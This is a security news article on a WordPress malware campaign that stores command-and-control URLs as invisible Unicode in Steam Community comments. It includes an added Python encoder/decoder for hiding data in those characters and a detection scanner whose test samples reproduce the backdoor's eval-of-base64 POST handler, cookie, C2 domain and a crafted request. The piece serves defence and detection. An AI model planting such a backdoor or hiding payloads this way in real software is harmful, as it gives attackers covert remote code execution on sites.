Roughly 2,000 WordPress sites have been infected by a malware campaign that hides its command-and-control (C2) data in comments posted on Steam Community profiles.
The threat actor encodes the payload in invisible Unicode characters; once decoded, it yields a URL that points to a malicious script.
By piggybacking on Valve's platform, the attacker avoids standing up dedicated C2 infrastructure, and outbound requests to steamcommunity.com blend in with legitimate traffic, sidestepping detection methods that look for unknown or newly registered domains.
Since the campaign was first identified in July 2025, GoDaddy researchers have found the malware on nearly 1,980 WordPress sites.
How the sites were initially compromised is not known; the researchers suggest possible vectors include stolen admin logins or FTP/SFTP credentials, vulnerable WordPress themes or plugins, or a supply-chain compromise.
Once implanted, the first-stage malware hooks WordPress page loads to fetch specific Steam profiles and pull the text of seemingly innocuous comments.
That text contains hidden Unicode characters that carry the encoded payload, in some cases disguised as ASCII art.
GoDaddy's researchers note that the encoding relies on six invisible Unicode characters:
- Zero-width non-joiner (U+200C)
- Zero-width joiner (U+200D)
- Function application (U+2061)
- Invisible times (U+2062)
- Invisible separator (U+2063)
- Invisible plus (U+2064)
The decoder discards every visible character, maps each invisible one to a numeric value, converts those values to bits, and reassembles the bit stream into bytes.
“This encoding technique permits the embedding of binary data within superficially innocuous text. The visible characters act as a facade, while the invisible ones transport the malevolent payload,” GoDaddy explains.
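The following is an added example, not GoDaddy's or the malware's code, showing how bytes can ride inside invisible Unicode code points interleaved with ordinary cover text. The six code points are the ones the analysis names; the roles assigned to them here (four as 2-bit digits, one as a byte separator, one as an end marker) are a hypothetical mapping chosen for illustration, since the page does not disclose the malware's actual table. The payload URL and cover comment are constructed placeholders.

```python
# Added example, not GoDaddy's or the malware's code. The bit assignment below
# is hypothetical; the article only names the six code points involved.

DIGITS = {
    "\u200c": "00",  # ZERO WIDTH NON-JOINER
    "\u200d": "01",  # ZERO WIDTH JOINER
    "\u2061": "10",  # FUNCTION APPLICATION
    "\u2062": "11",  # INVISIBLE TIMES
}
BYTE_SEP = "\u2063"  # INVISIBLE SEPARATOR: byte boundary (hypothetical role)
END_MARK = "\u2064"  # INVISIBLE PLUS: end of hidden stream (hypothetical role)
INVISIBLE = set(DIGITS) | {BYTE_SEP, END_MARK}
CHAR_FOR_BITS = {bits: ch for ch, bits in DIGITS.items()}


def encode(payload: bytes, cover: str) -> str:
    """Hide payload in cover text: four 2-bit symbols per byte, a separator
    after each byte, an end marker last, one hidden symbol after each cover char."""
    symbols = []
    for b in payload:
        bits = f"{b:08b}"
        symbols.extend(CHAR_FOR_BITS[bits[i:i + 2]] for i in range(0, 8, 2))
        symbols.append(BYTE_SEP)
    symbols.append(END_MARK)
    out = []
    for i, ch in enumerate(cover):
        out.append(ch)
        if i < len(symbols):
            out.append(symbols[i])
    out.extend(symbols[len(cover):])  # cover shorter than stream: append the rest
    return "".join(out)


def decode(text: str) -> bytes:
    """Drop every visible character, turn invisible ones back into bits and
    reassemble bytes; stop at the end marker, discard incomplete bytes."""
    out = bytearray()
    bits = ""
    for ch in text:
        if ch == END_MARK:
            break
        if ch == BYTE_SEP:
            if len(bits) == 8:
                out.append(int(bits, 2))
            bits = ""
        elif ch in DIGITS:
            bits += DIGITS[ch]
        # anything else is cover text and is ignored
    return bytes(out)


def visible(text: str) -> str:
    """What a reader (or a naive grep) sees: the text with hidden symbols removed."""
    return "".join(ch for ch in text if ch not in INVISIBLE)


if __name__ == "__main__":
    secret = b"https://example.invalid/lodash.core.min.js"  # placeholder, not the real C2
    comment = encode(secret, "gg, nice game! :)")
    print(repr(visible(comment)))  # reads as the harmless comment
    print(len(comment), "code points carry", len(visible(comment)), "visible characters")
    print(decode(comment))
```

The point to take from the decoder is that it never needs to know where the cover text ends and the payload begins: everything that is not one of the six code points is simply skipped, so the carrier can be a throwaway comment, ASCII art, or any other text the attacker controls.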
The decoded payload is used to build a URL on the domain hello-mywordl[.]info, from which JavaScript is fetched and injected into every frontend WordPress page.
File names such as asahi-jquery-min-bundle and lodash.core.min.js suggest the downloaded malware is meant to pass as a legitimate JavaScript library.
The final stage is a backdoor that responds to specially crafted POST requests, but only when a specific authentication cookie is present.
“If the tEcaKKXEsb cookie is detected, the backdoor will accept base64-encoded PHP code transmitted via POST parameters,” the researchers say.
(Image: POST request with the correct cookie)
GoDaddy's analysis lists several evasion techniques: obfuscation with octal and hex escapes, randomized function names, fake "disabled" logging code, and use of standard WordPress APIs so the malware's activity blends in with legitimate behavior.
Site administrators can check for references to Steam Community URLs, suspicious external JavaScript includes, outbound connections from the WordPress server to Steam, and unexpected scripts loaded from domains such as hello-mywordl[.]info.
Further indicators of compromise include invisible Unicode characters in files or cached data, anomalous _transient_caption_ cache entries, cURL requests with SSL verification disabled, and POST requests carrying the malware's authentication cookie or the new_code parameter.
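As an added example, not GoDaddy's tooling or the malware's code, the triage scanner below turns the indicators listed above into rules and runs them over constructed samples: a clean theme file, a PHP file mimicking the described behaviours, a rendered page with an injected script tag, a wp_options row whose cached value carries invisible code points, and a captured POST request. The sample file names, the placeholder Steam profile ID, and the example.invalid host are assumptions; the eval-of-base64 rule is a generic pattern inferred from the description of the backdoor rather than an indicator the report names.

```python
import re

# Added example, not GoDaddy's tooling or the malware's code. All sample
# inputs below are constructed; the indicators come from the article.

# The six invisible code points named in the analysis
INVISIBLE_RE = re.compile("[\u200c\u200d\u2061\u2062\u2063\u2064]")

# Literal indicators from the analysis (domain matched plain or defanged),
# plus one generic eval(base64_decode()) rule (assumption, not from the report)
RULES = [
    ("steam_community_url", re.compile(r"steamcommunity\.com", re.I)),
    ("c2_domain", re.compile(r"hello-mywordl(?:\.|\[\.\])info", re.I)),
    ("curl_ssl_verify_disabled",
     re.compile(r"CURLOPT_SSL_VERIFY(?:PEER|HOST)\s*,\s*(?:false|0)\b", re.I)),
    ("transient_caption_cache", re.compile(r"_transient_caption_\w*")),
    ("backdoor_cookie", re.compile(r"tEcaKKXEsb")),
    ("new_code_param", re.compile(r"\bnew_code\b")),
    ("eval_base64", re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)),
]

# <script src="https://host/..."> whose host is not one of the site's own
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]https?://([^/'\"]+)", re.I)


def scan_text(text, label, own_hosts=()):
    """Return (label, indicator, evidence) tuples for every indicator hit."""
    findings = []
    hidden = INVISIBLE_RE.findall(text)
    if hidden:
        findings.append((label, "invisible_unicode", f"{len(hidden)} invisible code points"))
    for name, rx in RULES:
        m = rx.search(text)
        if m:
            findings.append((label, name, m.group(0)))
    own = {h.lower() for h in own_hosts}
    for m in SCRIPT_SRC_RE.finditer(text):
        host = m.group(1).lower()
        if host not in own:
            findings.append((label, "external_script", host))
    return findings


# --- constructed samples ---------------------------------------------------

CLEAN_PHP = """<?php
add_action('wp_enqueue_scripts', function () {
    wp_enqueue_script('theme-main', get_template_directory_uri() . '/js/main.js');
});
"""

# Mimics the described behaviour: fetch a Steam profile with TLS verification
# off, cache the text in a transient, run base64-decoded PHP from POST when the
# cookie is present. The profile ID is a placeholder.
SUSPICIOUS_PHP = """<?php
$u = 'https://steamcommunity.com/profiles/00000000000000000/';
$ch = curl_init($u);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
set_transient('caption_' . md5($u), curl_exec($ch));
if (isset($_COOKIE['tEcaKKXEsb']) && isset($_POST['new_code'])) {
    eval(base64_decode($_POST['new_code']));
}
"""

# Rendered page with the site's own script plus an injected third-party one
INJECTED_HTML = ('<html><head><script src="https://example.invalid/js/main.js"></script>'
                 '<script src="https://hello-mywordl.info/lodash.core.min.js"></script>'
                 '</head></html>')

# wp_options row whose cached comment text carries the invisible code points
OPTIONS_ROW = "_transient_caption_3f2a9c\tgg \u200c\u200d\u2061 nice game \u2062\u2063\u2064"

# Captured POST request carrying the backdoor cookie and parameter
POST_REQUEST = ("POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: example.invalid\r\n"
                "Cookie: tEcaKKXEsb=1\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
                "new_code=PD9waHAgcGhwaW5mbygpOw==")


def run_samples(own_hosts=("example.invalid",)):
    """Scan every sample; returns {label: set of indicator names}."""
    samples = {
        "functions.php": CLEAN_PHP,
        "suspicious.php": SUSPICIOUS_PHP,
        "index.html": INJECTED_HTML,
        "wp_options": OPTIONS_ROW,
        "request.txt": POST_REQUEST,
    }
    return {label: {name for _, name, _ in scan_text(text, label, own_hosts)}
            for label, text in samples.items()}


if __name__ == "__main__":
    for label, hits in run_samples().items():
        print(f"{label}: {sorted(hits) or 'clean'}")
```

Point scan_text at files under wp-content, at a dump of the wp_options table, and at captured request bodies; a hit on invisible_unicode alone is worth a second look, since those six code points have almost no reason to appear in PHP source or cached option values.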
Researchers recommend restoring from a verified backup taken before the infection.
If that is not possible, a thorough manual cleanup is required, because “attackers may reinstate removed code via the backdoor if any remnants remain active.”
Source link: Bleepingcomputer.com.